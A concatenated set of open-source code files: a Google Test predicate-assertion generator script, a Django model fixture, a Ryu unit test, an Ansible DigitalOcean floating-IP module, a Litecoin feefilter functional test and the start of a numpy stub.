// Makes sure this header is not included before gtest.h.
#ifndef GTEST_INCLUDE_GTEST_GTEST_H_
# error Do not include gtest_pred_impl.h directly. Include gtest.h instead.
#endif // GTEST_INCLUDE_GTEST_GTEST_H_
// This header implements a family of generic predicate assertion
// macros:
//
// ASSERT_PRED_FORMAT1(pred_format, v1)
// ASSERT_PRED_FORMAT2(pred_format, v1, v2)
// ...
//
// where pred_format is a function or functor that takes n (in the
// case of ASSERT_PRED_FORMATn) values and their source expression
// text, and returns a testing::AssertionResult. See the definition
// of ASSERT_EQ in gtest.h for an example.
//
// If you don't care about formatting, you can use the more
// restrictive version:
//
// ASSERT_PRED1(pred, v1)
// ASSERT_PRED2(pred, v1, v2)
// ...
//
// where pred is an n-ary function or functor that returns bool,
// and the values v1, v2, ..., must support the << operator for
// streaming to std::ostream.
//
// We also define the EXPECT_* variations.
//
// For now we only support predicates whose arity is at most %(n)s.
// Please email googletestframework@googlegroups.com if you need
// support for higher arities.
// GTEST_ASSERT_ is the basic statement to which all of the assertions
// in this file reduce. Don't use this in your code.
#define GTEST_ASSERT_(expression, on_failure) \\
GTEST_AMBIGUOUS_ELSE_BLOCKER_ \\
if (const ::testing::AssertionResult gtest_ar = (expression)) \\
; \\
else \\
on_failure(gtest_ar.failure_message())
""" % DEFS)
def Arity(n):
"""Returns the English name of the given arity."""
if n < 0:
return None
elif n <= 3:
return ['nullary', 'unary', 'binary', 'ternary'][n]
else:
return '%s-ary' % n
def Title(word):
"""Returns the given word in title case. The difference between
this and string's title() method is that Title('4-ary') is '4-ary'
while '4-ary'.title() is '4-Ary'."""
return word[0].upper() + word[1:]
def OneTo(n):
"""Returns the list [1, 2, 3, ..., n]."""
return range(1, n + 1)
def Iter(n, format, sep=''):
"""Given a positive integer n, a format string that contains 0 or
more '%s' format specs, and optionally a separator string, returns
the join of n strings, each formatted with the format string on an
iterator ranged from 1 to n.
Example:
Iter(3, 'v%s', sep=', ') returns 'v1, v2, v3'.
"""
# How many '%s' specs are in format?
spec_count = len(format.split('%s')) - 1
return sep.join([format % (spec_count * (i,)) for i in OneTo(n)])
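# Editor's note: illustrative self-check, not invoked by the generator; it
# shows Iter() with a format holding two '%s' specs, where the same index
# fills both slots.
def _iter_examples():
  assert Iter(3, 'v%s', sep=', ') == 'v1, v2, v3'
  assert Iter(2, 'T%s v%s', sep=', ') == 'T1 v1, T2 v2'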
def ImplementationForArity(n):
"""Returns the implementation of n-ary predicate assertions."""
# A map the defines the values used in the implementation template.
DEFS = {
'n' : str(n),
'vs' : Iter(n, 'v%s', sep=', '),
'vts' : Iter(n, '#v%s', sep=', '),
'arity' : Arity(n),
'Arity' : Title(Arity(n))
}
impl = """
// Helper function for implementing {EXPECT|ASSERT}_PRED%(n)s. Don't use
// this in your code.
template <typename Pred""" % DEFS
impl += Iter(n, """,
typename T%s""")
impl += """>
AssertionResult AssertPred%(n)sHelper(const char* pred_text""" % DEFS
impl += Iter(n, """,
const char* e%s""")
impl += """,
Pred pred"""
impl += Iter(n, """,
const T%s& v%s""")
impl += """) {
if (pred(%(vs)s)) return AssertionSuccess();
""" % DEFS
impl += ' return AssertionFailure() << pred_text << "("'
impl += Iter(n, """
<< e%s""", sep=' << ", "')
impl += ' << ") evaluates to false, where"'
impl += Iter(n, """
<< "\\n" << e%s << " evaluates to " << v%s""")
impl += """;
}
// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT%(n)s.
// Don't use this in your code.
#define GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, on_failure)\\
GTEST_ASSERT_(pred_format(%(vts)s, %(vs)s), \\
on_failure)
// Internal macro for implementing {EXPECT|ASSERT}_PRED%(n)s. Don't use
// this in your code.
#define GTEST_PRED%(n)s_(pred, %(vs)s, on_failure)\\
GTEST_ASSERT_(::testing::AssertPred%(n)sHelper(#pred""" % DEFS
impl += Iter(n, """, \\
#v%s""")
impl += """, \\
pred"""
impl += Iter(n, """, \\
v%s""")
impl += """), on_failure)
// %(Arity)s predicate assertion macros.
#define EXPECT_PRED_FORMAT%(n)s(pred_format, %(vs)s) \\
GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, GTEST_NONFATAL_FAILURE_)
#define EXPECT_PRED%(n)s(pred, %(vs)s) \\
GTEST_PRED%(n)s_(pred, %(vs)s, GTEST_NONFATAL_FAILURE_)
#define ASSERT_PRED_FORMAT%(n)s(pred_format, %(vs)s) \\
GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, GTEST_FATAL_FAILURE_)
#define ASSERT_PRED%(n)s(pred, %(vs)s) \\
GTEST_PRED%(n)s_(pred, %(vs)s, GTEST_FATAL_FAILURE_)
""" % DEFS
return impl
def HeaderPostamble():
"""Returns the postamble for the header file."""
return """
#endif // GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
"""
def GenerateFile(path, content):
"""Given a file path and a content string, overwrites it with the
given content."""
print 'Updating file %s . . .' % path
f = file(path, 'w+')
print >>f, content,
f.close()
print 'File %s has been updated.' % path
def GenerateHeader(n):
"""Given the maximum arity n, updates the header file that implements
the predicate assertions."""
GenerateFile(HEADER,
HeaderPreamble(n)
+ ''.join([ImplementationForArity(i) for i in OneTo(n)])
+ HeaderPostamble())
def UnitTestPreamble():
"""Returns the preamble for the unit test file."""
# A map that defines the values used in the preamble template.
DEFS = {
'today' : time.strftime('%m/%d/%Y'),
'year' : time.strftime('%Y'),
'command' : '%s %s' % (os.path.basename(sys.argv[0]), sys.argv[1]),
}
return (
"""// Copyright 2006, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is AUTOMATICALLY GENERATED on %(today)s by command
// '%(command)s'. DO NOT EDIT BY HAND!
// Regression test for gtest_pred_impl.h
//
// This file is generated by a script and quite long. If you intend to
// learn how Google Test works by reading its unit tests, read
// gtest_unittest.cc instead.
//
// This is intended as a regression test for the Google Test predicate
// assertions. We compile it as part of the gtest_unittest target
// only to keep the implementation tidy and compact, as it is quite
// involved to set up the stage for testing Google Test using Google
// Test itself.
//
// Currently, gtest_unittest takes ~11 seconds to run in the testing
// daemon. In the future, if it grows too large and needs much more
// time to finish, we should consider separating this file into a
// stand-alone regression test.
#include <iostream>
#include "gtest/gtest.h"
#include "gtest/gtest-spi.h"
// A user-defined data type.
struct Bool {
explicit Bool(int val) : value(val != 0) {}
bool operator>(int n) const { return value > Bool(n).value; }
Bool operator+(const Bool& rhs) const { return Bool(value + rhs.value); }
bool operator==(const Bool& rhs) const { return value == rhs.value; }
bool value;
};
// Enables Bool to be used in assertions.
std::ostream& operator<<(std::ostream& os, const Bool& x) {
return os << (x.value ? "true" : "false");
}
""" % DEFS)
def TestsForArity(n):
"""Returns the tests for n-ary predicate assertions."""
# A map that defines the values used in the template for the tests.
DEFS = {
'n' : n,
'es' : Iter(n, 'e%s', sep=', '),
'vs' : Iter(n, 'v%s', sep=', '),
'vts' : Iter(n, '#v%s', sep=', '),
'tvs' : Iter(n, 'T%s v%s', sep=', '),
'int_vs' : Iter(n, 'int v%s', sep=', '),
'Bool_vs' : Iter(n, 'Bool v%s', sep=', '),
'types' : Iter(n, 'typename T%s', sep=', '),
'v_sum' : Iter(n, 'v%s', sep=' + '),
'arity' : Arity(n),
'Arity' : Title(Arity(n)),
}
tests = (
"""// Sample functions/functors for testing %(arity)s predicate assertions.
// A %(arity)s predicate function.
template <%(types)s>
bool PredFunction%(n)s(%(tvs)s) {
return %(v_sum)s > 0;
}
// The following two functions are needed to circumvent a bug in
// gcc 2.95.3, which sometimes has problem with the above template
// function.
bool PredFunction%(n)sInt(%(int_vs)s) {
return %(v_sum)s > 0;
}
bool PredFunction%(n)sBool(%(Bool_vs)s) {
return %(v_sum)s > 0;
}
""" % DEFS)
tests += """
// A %(arity)s predicate functor.
struct PredFunctor%(n)s {
template <%(types)s>
bool operator()(""" % DEFS
tests += Iter(n, 'const T%s& v%s', sep=""",
""")
tests += """) {
return %(v_sum)s > 0;
}
};
""" % DEFS
tests += """
// A %(arity)s predicate-formatter function.
template <%(types)s>
testing::AssertionResult PredFormatFunction%(n)s(""" % DEFS
tests += Iter(n, 'const char* e%s', sep=""",
""")
tests += Iter(n, """,
const T%s& v%s""")
tests += """) {
if (PredFunction%(n)s(%(vs)s))
return testing::AssertionSuccess();
return testing::AssertionFailure()
<< """ % DEFS
tests += Iter(n, 'e%s', sep=' << " + " << ')
tests += """
<< " is expected to be positive, but evaluates to "
<< %(v_sum)s << ".";
}
""" % DEFS
tests += """
// A %(arity)s predicate-formatter functor.
struct PredFormatFunctor%(n)s {
template <%(types)s>
testing::AssertionResult operator()(""" % DEFS
tests += Iter(n, 'const char* e%s', sep=""",
""")
tests += Iter(n, """,
const T%s& v%s""")
tests += """) const {
return PredFormatFunction%(n)s(%(es)s, %(vs)s);
}
};
""" % DEFS
tests += """
// Tests for {EXPECT|ASSERT}_PRED_FORMAT%(n)s.
class Predicate%(n)sTest : public testing::Test {
protected:
virtual void SetUp() {
expected_to_finish_ = true;
finished_ = false;""" % DEFS
tests += """
""" + Iter(n, 'n%s_ = ') + """0;
}
"""
tests += """
virtual void TearDown() {
// Verifies that each of the predicate's arguments was evaluated
// exactly once."""
tests += ''.join(["""
EXPECT_EQ(1, n%s_) <<
"The predicate assertion didn't evaluate argument %s "
"exactly once.";""" % (i, i + 1) for i in OneTo(n)])
tests += """
// Verifies that the control flow in the test function is expected.
if (expected_to_finish_ && !finished_) {
FAIL() << "The predicate assertion unexpactedly aborted the test.";
} else if (!expected_to_finish_ && finished_) {
FAIL() << "The failed predicate assertion didn't abort the test "
"as expected.";
}
}
// true iff the test function is expected to run to finish.
static bool expected_to_finish_;
// true iff the test function did run to finish.
static bool finished_;
""" % DEFS
tests += Iter(n, """
static int n%s_;""")
tests += """
};
bool Predicate%(n)sTest::expected_to_finish_;
bool Predicate%(n)sTest::finished_;
""" % DEFS
tests += Iter(n, """int Predicate%%(n)sTest::n%s_;
""") % DEFS
tests += """
typedef Predicate%(n)sTest EXPECT_PRED_FORMAT%(n)sTest;
typedef Predicate%(n)sTest ASSERT_PRED_FORMAT%(n)sTest;
typedef Predicate%(n)sTest EXPECT_PRED%(n)sTest;
typedef Predicate%(n)sTest ASSERT_PRED%(n)sTest;
""" % DEFS
def GenTest(use_format, use_assert, expect_failure,
use_functor, use_user_type):
"""Returns the test for a predicate assertion macro.
Args:
use_format: true iff the assertion is a *_PRED_FORMAT*.
use_assert: true iff the assertion is a ASSERT_*.
expect_failure: true iff the assertion is expected to fail.
use_functor: true iff the first argument of the assertion is
a functor (as opposed to a function)
use_user_type: true iff the predicate functor/function takes
argument(s) of a user-defined type.
Example:
GenTest(1, 0, 0, 1, 0) returns a test that tests the behavior
of a successful EXPECT_PRED_FORMATn() that takes a functor
whose arguments have built-in types."""
if use_assert:
assrt = 'ASSERT' # 'assert' is reserved, so we cannot use
# that identifier here.
else:
assrt = 'EXPECT'
assertion = assrt + '_PRED'
if use_format:
pred_format = 'PredFormat'
assertion += '_FORMAT'
else:
pred_format = 'Pred'
assertion += '%(n)s' % DEFS
if use_functor:
pred_format_type = 'functor'
pred_format += 'Functor%(n)s()'
else:
pred_format_type = 'function'
pred_format += 'Function%(n)s'
if not use_format:
if use_user_type:
pred_format += 'Bool'
else:
pred_format += 'Int'
test_name = pred_format_type.title()
if use_user_type:
arg_type = 'user-defined type (Bool)'
test_name += 'OnUserType'
if expect_failure:
arg = 'Bool(n%s_++)'
else:
arg = 'Bool(++n%s_)'
else:
arg_type = 'built-in type (int)'
test_name += 'OnBuiltInType'
if expect_failure:
arg = 'n%s_++'
else:
arg = '++n%s_'
if expect_failure:
successful_or_failed = 'failed'
expected_or_not = 'expected.'
test_name += 'Failure'
else:
successful_or_failed = 'successful'
expected_or_not = 'UNEXPECTED!'
test_name += 'Success'
# A map that defines the values used in the test template.
defs = DEFS.copy()
defs.update({
'assert' : assrt,
'assertion' : assertion,
'test_name' : test_name,
'pf_type' : pred_format_type,
'pf' : pred_format,
'arg_type' : arg_type,
'arg' : arg,
'successful' : successful_or_failed,
'expected' : expected_or_not,
})
test = """
// Tests a %(successful)s %(assertion)s where the
// predicate-formatter is a %(pf_type)s on a %(arg_type)s.
TEST_F(%(assertion)sTest, %(test_name)s) {""" % defs
indent = (len(assertion) + 3)*' '
extra_indent = ''
if expect_failure:
extra_indent = ' '
if use_assert:
test += """
expected_to_finish_ = false;
EXPECT_FATAL_FAILURE({ // NOLINT"""
else:
test += """
EXPECT_NONFATAL_FAILURE({ // NOLINT"""
test += '\n' + extra_indent + """ %(assertion)s(%(pf)s""" % defs
test = test % defs
test += Iter(n, ',\n' + indent + extra_indent + '%(arg)s' % defs)
test += ');\n' + extra_indent + ' finished_ = true;\n'
if expect_failure:
test += ' }, "");\n'
test += '}\n'
return test
  # Generates tests for all 2**5 = 32 combinations.
tests += ''.join([GenTest(use_format, use_assert, expect_failure,
use_functor, use_user_type)
for use_format in [0, 1]
for use_assert in [0, 1]
for expect_failure in [0, 1]
for use_functor in [0, 1]
for use_user_type in [0, 1]
])
return tests
def UnitTestPostamble():
"""Returns the postamble for the tests."""
return ''
def GenerateUnitTest(n):
"""Returns the tests for up-to n-ary predicate assertions."""
GenerateFile(UNIT_TEST,
UnitTestPreamble()
+ ''.join([TestsForArity(i) for i in OneTo(n)])
+ UnitTestPostamble())
def _Main():
"""The entry point of the script. Generates the header file and its
unit test."""
if len(sys.argv) != 2:
print __doc__
print 'Author: ' + __author__
sys.exit(1)
n = int(sys.argv[1])
GenerateHeader(n)
GenerateUnitTest(n)
if __name__ == '__main__':
_Main()
| apache-2.0 |
Kazade/NeHe-Website | google_appengine/lib/django_1_2/tests/modeltests/m2m_intermediary/models.py | 92 | 1086 | """
9. Many-to-many relationships via an intermediary table
For many-to-many relationships that need extra fields on the intermediary
table, use an intermediary model.
In this example, an ``Article`` can have multiple ``Reporter`` objects, and
each ``Article``-``Reporter`` combination (a ``Writer``) has a ``position``
field, which specifies the ``Reporter``'s position for the given article
(e.g. "Staff writer").
"""
from django.db import models
class Reporter(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=30)
def __unicode__(self):
return u"%s %s" % (self.first_name, self.last_name)
class Article(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateField()
def __unicode__(self):
return self.headline
class Writer(models.Model):
reporter = models.ForeignKey(Reporter)
article = models.ForeignKey(Article)
position = models.CharField(max_length=100)
def __unicode__(self):
return u'%s (%s)' % (self.reporter, self.position)
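# Editor's note: a brief, hypothetical ORM sketch (not part of the original
# fixture) showing how the intermediary model ties the two sides together.
def example_usage():
    from datetime import date
    r = Reporter.objects.create(first_name='John', last_name='Smith')
    a = Article.objects.create(headline='Hello', pub_date=date(2005, 7, 27))
    Writer.objects.create(reporter=r, article=a, position='Staff writer')
    return a.writer_set.all()  # e.g. [<Writer: John Smith (Staff writer)>]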
| bsd-3-clause |
zyq001/ryu | ryu/tests/unit/ofproto/test_inet.py | 63 | 1254 | # Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import unittest
import logging
from nose.tools import eq_
from ryu.ofproto.inet import *
LOG = logging.getLogger('test_inet')
class TestInet(unittest.TestCase):
""" Test case for inet
"""
def test_ip_proto(self):
eq_(IPPROTO_IP, 0)
eq_(IPPROTO_HOPOPTS, 0)
eq_(IPPROTO_ICMP, 1)
eq_(IPPROTO_TCP, 6)
eq_(IPPROTO_UDP, 17)
eq_(IPPROTO_ROUTING, 43)
eq_(IPPROTO_FRAGMENT, 44)
eq_(IPPROTO_AH, 51)
eq_(IPPROTO_ICMPV6, 58)
eq_(IPPROTO_NONE, 59)
eq_(IPPROTO_DSTOPTS, 60)
eq_(IPPROTO_SCTP, 132)
| apache-2.0 |
sorenk/ansible | lib/ansible/modules/cloud/digital_ocean/digital_ocean_floating_ip.py | 23 | 9251 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, Patrick F. Marques <patrickfmarques@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: digital_ocean_floating_ip
short_description: Manage DigitalOcean Floating IPs
description:
- Create/delete/assign a floating IP.
version_added: "2.4"
author: "Patrick Marques (@pmarques)"
options:
state:
description:
- Indicate desired state of the target.
default: present
choices: ['present', 'absent']
ip:
description:
- Public IP address of the Floating IP. Used to remove an IP
region:
description:
- The region that the Floating IP is reserved to.
droplet_id:
description:
- The Droplet that the Floating IP has been assigned to.
oauth_token:
description:
- DigitalOcean OAuth token.
required: true
notes:
- Version 2 of DigitalOcean API is used.
requirements:
- "python >= 2.6"
'''
EXAMPLES = '''
- name: "Create a Floating IP in region lon1"
digital_ocean_floating_ip:
state: present
region: lon1
- name: "Create a Floating IP assigned to Droplet ID 123456"
digital_ocean_floating_ip:
state: present
droplet_id: 123456
- name: "Delete a Floating IP with ip 1.2.3.4"
digital_ocean_floating_ip:
state: absent
ip: "1.2.3.4"
'''
RETURN = '''
# Digital Ocean API info https://developers.digitalocean.com/documentation/v2/#floating-ips
data:
description: a DigitalOcean Floating IP resource
returned: success and no resource constraint
type: dict
sample: {
"action": {
"id": 68212728,
"status": "in-progress",
"type": "assign_ip",
"started_at": "2015-10-15T17:45:44Z",
"completed_at": null,
"resource_id": 758603823,
"resource_type": "floating_ip",
"region": {
"name": "New York 3",
"slug": "nyc3",
"sizes": [
"512mb",
"1gb",
"2gb",
"4gb",
"8gb",
"16gb",
"32gb",
"48gb",
"64gb"
],
"features": [
"private_networking",
"backups",
"ipv6",
"metadata"
],
"available": true
},
"region_slug": "nyc3"
}
}
'''
import json
import time
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from ansible.module_utils.urls import fetch_url
class Response(object):
def __init__(self, resp, info):
self.body = None
if resp:
self.body = resp.read()
self.info = info
@property
def json(self):
if not self.body:
if "body" in self.info:
return json.loads(self.info["body"])
return None
try:
return json.loads(self.body)
except ValueError:
return None
@property
def status_code(self):
return self.info["status"]
class Rest(object):
def __init__(self, module, headers):
self.module = module
self.headers = headers
self.baseurl = 'https://api.digitalocean.com/v2'
def _url_builder(self, path):
if path[0] == '/':
path = path[1:]
return '%s/%s' % (self.baseurl, path)
def send(self, method, path, data=None, headers=None):
url = self._url_builder(path)
data = self.module.jsonify(data)
timeout = self.module.params['timeout']
resp, info = fetch_url(self.module, url, data=data, headers=self.headers, method=method, timeout=timeout)
        # Exceptions in fetch_url may result in a status of -1; this check
        # surfaces the underlying error message early.
if info['status'] == -1:
self.module.fail_json(msg=info['msg'])
return Response(resp, info)
def get(self, path, data=None, headers=None):
return self.send('GET', path, data, headers)
def put(self, path, data=None, headers=None):
return self.send('PUT', path, data, headers)
def post(self, path, data=None, headers=None):
return self.send('POST', path, data, headers)
def delete(self, path, data=None, headers=None):
return self.send('DELETE', path, data, headers)
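# Editor's note: illustrative helper (hypothetical, not called by this module)
# showing the Rest wrapper in isolation; the endpoint follows the DigitalOcean
# API v2 paths already used below.
def example_list_floating_ips(module):
    rest = Rest(module, {'Authorization': 'Bearer {0}'.format(module.params['oauth_token']),
                         'Content-type': 'application/json'})
    response = rest.get('floating_ips')  # GET https://api.digitalocean.com/v2/floating_ips
    if response.status_code == 200:
        return response.json['floating_ips']
    module.fail_json(msg="Error listing floating ips [{0}]".format(response.status_code))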
def wait_action(module, rest, ip, action_id, timeout=10):
    end_time = time.time() + timeout
while time.time() < end_time:
response = rest.get('floating_ips/{0}/actions/{1}'.format(ip, action_id))
status_code = response.status_code
status = response.json['action']['status']
# TODO: check status_code == 200?
if status == 'completed':
return True
elif status == 'errored':
            module.fail_json(msg='Floating ip action error [ip: {0}: action: {1}]'.format(
                ip, action_id), data=response.json)
    module.fail_json(msg='Floating ip action timeout [ip: {0}: action: {1}]'.format(
        ip, action_id), data=response.json)
def core(module):
api_token = module.params['oauth_token']
state = module.params['state']
ip = module.params['ip']
droplet_id = module.params['droplet_id']
rest = Rest(module, {'Authorization': 'Bearer {0}'.format(api_token),
'Content-type': 'application/json'})
    if state == 'present':
        if droplet_id is not None and module.params['ip'] is not None:
            # Let's try to associate the IP with the specified droplet
            associate_floating_ips(module, rest)
else:
create_floating_ips(module, rest)
    elif state == 'absent':
response = rest.delete("floating_ips/{0}".format(ip))
status_code = response.status_code
json_data = response.json
if status_code == 204:
module.exit_json(changed=True)
elif status_code == 404:
module.exit_json(changed=False)
else:
module.exit_json(changed=False, data=json_data)
def get_floating_ip_details(module, rest):
ip = module.params['ip']
response = rest.get("floating_ips/{0}".format(ip))
status_code = response.status_code
json_data = response.json
if status_code == 200:
return json_data['floating_ip']
else:
module.fail_json(msg="Error assigning floating ip [{0}: {1}]".format(
status_code, json_data["message"]), region=module.params['region'])
def assign_floating_id_to_droplet(module, rest):
ip = module.params['ip']
payload = {
"type": "assign",
"droplet_id": module.params['droplet_id'],
}
response = rest.post("floating_ips/{0}/actions".format(ip), data=payload)
status_code = response.status_code
json_data = response.json
if status_code == 201:
wait_action(module, rest, ip, json_data['action']['id'])
module.exit_json(changed=True, data=json_data)
else:
module.fail_json(msg="Error creating floating ip [{0}: {1}]".format(
status_code, json_data["message"]), region=module.params['region'])
def associate_floating_ips(module, rest):
floating_ip = get_floating_ip_details(module, rest)
droplet = floating_ip['droplet']
    # TODO: If already assigned to a droplet, verify it is one of the specified valid droplets
if droplet is not None and str(droplet['id']) in [module.params['droplet_id']]:
module.exit_json(changed=False)
else:
assign_floating_id_to_droplet(module, rest)
def create_floating_ips(module, rest):
payload = {
}
if module.params['region'] is not None:
payload["region"] = module.params['region']
if module.params['droplet_id'] is not None:
payload["droplet_id"] = module.params['droplet_id']
response = rest.post("floating_ips", data=payload)
status_code = response.status_code
json_data = response.json
if status_code == 202:
module.exit_json(changed=True, data=json_data)
else:
module.fail_json(msg="Error creating floating ip [{0}: {1}]".format(
status_code, json_data["message"]), region=module.params['region'])
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(choices=['present', 'absent'], default='present'),
ip=dict(aliases=['id'], required=False),
region=dict(required=False),
droplet_id=dict(required=False),
oauth_token=dict(
no_log=True,
# Support environment variable for DigitalOcean OAuth Token
fallback=(env_fallback, ['DO_API_TOKEN', 'DO_API_KEY', 'DO_OAUTH_TOKEN']),
required=True,
),
validate_certs=dict(type='bool', default=True),
timeout=dict(type='int', default=30),
),
required_if=([
        ('state', 'absent', ['ip'])
]),
mutually_exclusive=(
['region', 'droplet_id']
),
)
core(module)
if __name__ == '__main__':
main()
| gpl-3.0 |
vmp32k/litecoin | test/functional/p2p_feefilter.py | 23 | 3614 | #!/usr/bin/env python3
# Copyright (c) 2016-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of feefilter messages."""
from decimal import Decimal
import time
from test_framework.messages import msg_feefilter
from test_framework.mininode import mininode_lock, P2PInterface
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import sync_blocks, sync_mempools
def hashToHex(hash):
return format(hash, '064x')
# Wait up to 60 secs to see if the testnode has received all the expected invs
def allInvsMatch(invsExpected, testnode):
for x in range(60):
with mininode_lock:
if (sorted(invsExpected) == sorted(testnode.txinvs)):
return True
time.sleep(1)
return False
class TestP2PConn(P2PInterface):
def __init__(self):
super().__init__()
self.txinvs = []
def on_inv(self, message):
for i in message.inv:
if (i.type == 1):
self.txinvs.append(hashToHex(i.hash))
def clear_invs(self):
with mininode_lock:
self.txinvs = []
class FeeFilterTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node1 = self.nodes[1]
node0 = self.nodes[0]
# Get out of IBD
node1.generate(1)
sync_blocks(self.nodes)
self.nodes[0].add_p2p_connection(TestP2PConn())
# Test that invs are received for all txs at feerate of 20 sat/byte
node1.settxfee(Decimal("0.00020000"))
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Set a filter of 15 sat/byte
self.nodes[0].p2p.send_and_ping(msg_feefilter(15000))
# Test that txs are still being received (paying 20 sat/byte)
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Change tx fee rate to 10 sat/byte and test they are no longer received
node1.settxfee(Decimal("0.00010000"))
[node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
sync_mempools(self.nodes) # must be sure node 0 has received all txs
        # Send one transaction from node0 that should be received, so that
# we can sync the test on receipt (if node1's txs were relayed, they'd
# be received by the time this node0 tx is received). This is
# unfortunately reliant on the current relay behavior where we batch up
# to 35 entries in an inv, which means that when this next transaction
# is eligible for relay, the prior transactions from node1 are eligible
# as well.
node0.settxfee(Decimal("0.00020000"))
txids = [node0.sendtoaddress(node0.getnewaddress(), 1)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
# Remove fee filter and check that txs are received again
self.nodes[0].p2p.send_and_ping(msg_feefilter(0))
txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)]
assert(allInvsMatch(txids, self.nodes[0].p2p))
self.nodes[0].p2p.clear_invs()
if __name__ == '__main__':
FeeFilterTest().main()
| mit |
orekyuu/intellij-community | python/testData/types/NumpyArrayType/numpy/core/multiarray.py | 79 | 7955 | def array(p_object, dtype=None, copy=True, order=None, subok=False, ndmin=0): # real signature unknown; restored from __doc__
"""
array(object, dtype=None, copy=True, order=None, subok=False, ndmin=0)
Create an array.
Parameters
----------
object : array_like
An array, any object exposing the array interface, an
object whose __array__ method returns an array, or any
(nested) sequence.
dtype : data-type, optional
The desired data-type for the array. If not given, then
the type will be determined as the minimum type required
to hold the objects in the sequence. This argument can only
be used to 'upcast' the array. For downcasting, use the
.astype(t) method.
copy : bool, optional
If true (default), then the object is copied. Otherwise, a copy
will only be made if __array__ returns a copy, if obj is a
nested sequence, or if a copy is needed to satisfy any of the other
requirements (`dtype`, `order`, etc.).
order : {'C', 'F', 'A'}, optional
Specify the order of the array. If order is 'C' (default), then the
array will be in C-contiguous order (last-index varies the
fastest). If order is 'F', then the returned array
will be in Fortran-contiguous order (first-index varies the
fastest). If order is 'A', then the returned array may
be in any order (either C-, Fortran-contiguous, or even
discontiguous).
subok : bool, optional
If True, then sub-classes will be passed-through, otherwise
the returned array will be forced to be a base-class array (default).
ndmin : int, optional
Specifies the minimum number of dimensions that the resulting
array should have. Ones will be pre-pended to the shape as
needed to meet this requirement.
Returns
-------
out : ndarray
An array object satisfying the specified requirements.
See Also
--------
empty, empty_like, zeros, zeros_like, ones, ones_like, fill
Examples
--------
>>> np.array([1, 2, 3])
array([1, 2, 3])
Upcasting:
>>> np.array([1, 2, 3.0])
array([ 1., 2., 3.])
More than one dimension:
>>> np.array([[1, 2], [3, 4]])
array([[1, 2],
[3, 4]])
Minimum dimensions 2:
>>> np.array([1, 2, 3], ndmin=2)
array([[1, 2, 3]])
Type provided:
>>> np.array([1, 2, 3], dtype=complex)
array([ 1.+0.j, 2.+0.j, 3.+0.j])
Data-type consisting of more than one element:
>>> x = np.array([(1,2),(3,4)],dtype=[('a','<i4'),('b','<i4')])
>>> x['a']
array([1, 3])
Creating an array from sub-classes:
>>> np.array(np.mat('1 2; 3 4'))
array([[1, 2],
[3, 4]])
>>> np.array(np.mat('1 2; 3 4'), subok=True)
matrix([[1, 2],
[3, 4]])
"""
pass
class ndarray(object):
"""
ndarray(shape, dtype=float, buffer=None, offset=0,
strides=None, order=None)
